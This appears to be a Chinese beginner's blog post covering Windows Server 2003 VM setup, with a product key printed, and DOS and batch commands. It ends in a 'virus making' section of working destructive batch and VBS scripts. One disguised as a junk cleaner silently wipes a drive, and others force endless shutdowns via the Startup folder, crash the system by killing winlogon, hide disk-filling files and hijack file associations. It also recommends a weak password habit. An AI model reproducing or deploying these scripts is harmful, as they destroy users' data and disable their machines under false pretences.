02.win2003虚拟机安装和dos命令

1. windows server 2003的部署

windows server 2003是运行在服务器上的一种操作系统

1.1 创建步骤

image-20200826161153243

image-20200826161213946

image-20200826161123751

image-20200826161239952

image-20200826161347584

image-20200826161425871

然后点击自定义硬件,更改iso文件位置

image-20200826161623460

image-20200826161651193

然后就是开机配置一些设置即可

image-20200826161745618

image-20200826162954830

image-20200826163017539

image-20200826163043106

image-20200826163117633

image-20200826163251271

image-20200826163315801

image-20200826163351239

image-20200826163421837

image-20200826163440421

image-20200826221527511

image-20200826221610684

image-20200826222054037

产品密钥: MDGJK-PF6YQ-PD8DJ-RFQVM-7WKWG

image-20200826222144258

image-20200826222258777

image-20200826222321851

image-20200826222808194

image-20200826222944986

接下来就是下一步, 然后等待了

image-20200826223610093

image-20200826223647429

image-20200826223946159

image-20200826224024233

然后就是调出桌面图标 , 然后安装vmtools,重启,然后关机做快照。

2. windows系统的版本历史进程

2.1 面向个人的系统

  • win 3.1/3.2 1995年以前
  • win 95 1995年
  • win 98 1998年
  • win 2000 2000年
  • win me
  • win xp 2003年
  • win vista
  • win 7
  • win 8
  • win 10

2.2 面向企业做服务器的系统

  • win server NT

  • win server 2000

  • win server 2003

  • win server 2008

  • win server 2012

3. 关于密码口令和administrator

3.1 四大要素

  • 数字
  • 大写字母
  • 小写字母
  • 特殊符号

只要满足3/4才能算合格,个人习惯123.com

3.2 administrator

是管理员的意思,在win系统中administrator近似于最高权限,所以黑客入侵你的系统肯定是先破解

出你管理员的账号和密码。

4. 取消开机的那个烦人的提示 (ctrl + Alt + Delete)

开始 ---> 运行 ---> 输入gpedit.msc

image-20200827225028631

image-20200827225229850

image-20200827225252581

5. 病毒程序制作

病毒程序包括两种,一种是图形化界面入侵,一种是命令行入侵,命令行也叫shell,行话拿到对方的shell

5.1 操作dos命令

dos命令是指dos操作系统的命令,是一种面向磁盘的操作命令,主要包括目录操作类命令,磁盘操作类命令,文件操作类命令和其他命令.

建议初学者在虚拟机中完成实验!!!
在命令行下删除的东西,一律不进回收站,是找不回的.

开始 --> 运行 --> 输入cmd --> 回车,本质上就是调出cmd.exe这个可执行程序
win+R --> 输入cmd --> 回车

5.1.1 基本命令

- cls  清空屏幕
- cd   --> change directory  改变文件夹
- . 代表当前文件夹
- .. 代表上一级文件夹
- cd .. 切换当上级文件夹(后退)
- E: 切换盘符
- ctrl + 空格 命令行显示中文输入	
- tab 补全路径功能
- exit 关闭cmd

5.1.2 目录相关

- 1.dir 
  浏览当前文件夹的内容(带<dir>标识的为文件夹,否则为文件)
  dir 文件路径
- 2.md
  创建文件夹,如果想要创建多个同级文件夹用逗号/空格隔开
  md test1 test2 test3
- 3.rd
   remove directory 删除文件夹,默认只能删除空文件夹
- 4.rd 文件夹 /s/q   
   s 代表递归删除 
   q 代表无提示
   原则上可以删除所有的东东,默认系统级别的文件夹删除不了,只能删除用户级别的
-5.创建访问不了的文件夹
   mkdir  123..\

5.1.3 颜色和相对路径和绝对路径

- color ?
  返回颜色的命令提示,相当于官方文档
- color 0b
  前面一个是背景色,后面一个代表字体颜色
- cd ..\adc\demo  这是相对路径
- cd \day01\abc\demo  这是绝对路径

# 区别就是一个是相对自己把自己做起始路径
# 一个是从把根作为起始路径

5.1.4 文件相关

- echo 内容 > 文件名
  echo是回显,本质上的作用是把屏幕上的内容写入文件, > 是把原内容清空,然后写入新的内容
- echo 内容 >> 文件名
  这次就不会把原内容清空写入,而是追加写入,而且是自动换行
- type 文件名
  将文件内容打印在屏幕上
- del 文件路径
  删除文件
- del *.txt
  *可以理解成通配符,能匹配任意字符
  这句命令的意思是删除txt格式的文件
- del *.*
  删除所有类型的所有文件,系统会二次确认
- copy 原文件 目标路径
  将文件拷贝到某某路径下
- move 原文件 目标路径
  将文件移动到改路径下

5.1.5 一点点的骚操作命令

- fsutil fsinfo drives
  列出当前电脑的所有分区
    
- ren 原名 新名 
  即可以重命名文件也可以重命名文件夹
    
- dir >> test.txt
  dir这个命令返回的就是你屏幕上的那几行字符,当dir和 >> test.txt连用时会把屏幕上的内容追加
  写到test.txt文件中,并不会在屏幕上返回

- rd . /s/q >> test.txt
  依然在屏幕上回显错误信息,因为test.txt就在该路径下
    
- rd . /s/q 2>> C:\test.txt
  2>代表的是只输出错误信息,并追加在 C:\test.txt 这个文件中
    
- rd ./s/q > nul 2> null
  递归删除所有文件夹包括文件,并且无提示,无屏幕显示
  这条命令在屏幕上不要有任何的输出,如果是正确的提示,变成nul 错误的也变成nul
  null 可以理解为回收站
    
- del *.* /s/q > nul 2>nul
  删除当前路径下的所有文件,包括子文件,并且无提示,无屏幕显示信息
    
- attrib +h 文件夹
  h是hidden隐藏的意思,对文件夹进行隐藏,勾选显示所有文件,能够显示出来
    
- attrib -h 文件夹
  取消文件夹的隐藏
    
- attrib +s +h 文件夹
  把它提升到系统文件夹,并隐藏,勾选显示,也不会显示.
    
- attrib -s -h 文件夹
  取消系统级别,以及隐藏 
    
-echo y|cacls "C:\wmpub" /t /p everyone:f    设置C:\wmpub目录所有人都有控制权限
    
- dir /a 
  a代表的是all的意思,无论是系统文件还是隐藏文件都会显示

5.1.6 定时关机或重启

- shutdown -s -t 秒       # 定时关机
- shutdown -s -f -t 秒    # 定时强制关机
- shutdown -r -t 秒       # 定时重启
- shutdown -a             # 取消定时
- shutdown -l             # 注销,同logoff命令相同

5.2 批处理

批处理,就是把几句命令从上到下依次执行,江湖人称脚本。

5.2.1 创建批处理

  • 新建一个记事本文件,然后将扩展名改为.bat,然后会有系统提示,确认即可。

  • image-20200828232345632

  • 然后右键编辑,在里面写你要执行的命令就行了。

5.2.2 批处理语法

- @echo off 
  关闭回显功能,也就是屏蔽过程,一般放在文件的首行
- pause
  暂停批处理
- title 标题名
  为批处理脚本设置标题
- echo.
  在执行批处理脚本的时候可以空一行
- set
  设置变量.常用与在脚本中的互动赋值
  set /p time=请输入时间:
- taskkill /im explorer.exe /f >nul 2>nul
  强力杀死explorer任务,在个人平台上 
- ping 
  检测网络的连接是否正常
  ping -n 8 127.0.0.1 >nul 2>nul
- start 
  开启一个进程
  start c:\windows\explorer.exe  重启xp桌面
- ntsd -c q -pn winlogon.exe   
  win2003 的杀死进程的命令
- assoc .txt = exefile  .txt文件当成可执行文件打开
  assoc 修改文件关联性

5.3 小病毒示例:

  • 清空任意一个盘符下的所有文件,伪装成垃圾清理软件

    @echo off
E:
cd \
echo 先生你好,检测到你的电脑E盘有部分垃圾,准备进行清理
pause
rd . /s/q >nul 2>nul
echo 感谢使用,垃圾清理完毕。
pause

  • 自定义关机小程序

    @echo off
color 0a
echo =======================
echo   欢迎来到mn的关机小程序
echo =======================
set /p a="请输入关机倒计时,单位是秒:"
shutdown -s -f -t %a%
pause

  • 升级版,电脑无限关机程序,一开机就立马关机

    @echo off
copy mm.bat "C:\Documents and Settings\Administrator\「开始」菜单\程序\启动"  win2003启动路径
shutdown -s -f -t 0

  • 瞬间干掉部分空间并且不容易发现

    @echo off
fsutil file createnew 文件路径 大小(单位是字节) 
attrib +s +h 文件路径

  • win server 2003 蓝屏炸弹

    @echo off
copy mm.bat "C:\Documents and Settings\Administrator\「开始」菜单\程序\启动"
ntsd -c q -pn winlogon.exe   # win2003 的杀死进程的命令

  • 篡改文件关联性 毒药

    assoc .exe=txtfile 这个命令你电脑就废了,因为cmd无法运行了,重装系统吧.

    @echo off
assoc .txt=exefile
assoc .bmp=exefile
assoc .wav=exefile

  • 解药

    @echo off
assoc .txt=txtfile
assoc .bmp=bmpfile
assoc .wav=wavfile

  • vbs 无线弹窗炸弹

    do
    msgbox "ymn牛逼"
loop
posted @ 2021-03-01 17:06  Mn猿  阅读(389)  评论(0编辑  收藏  举报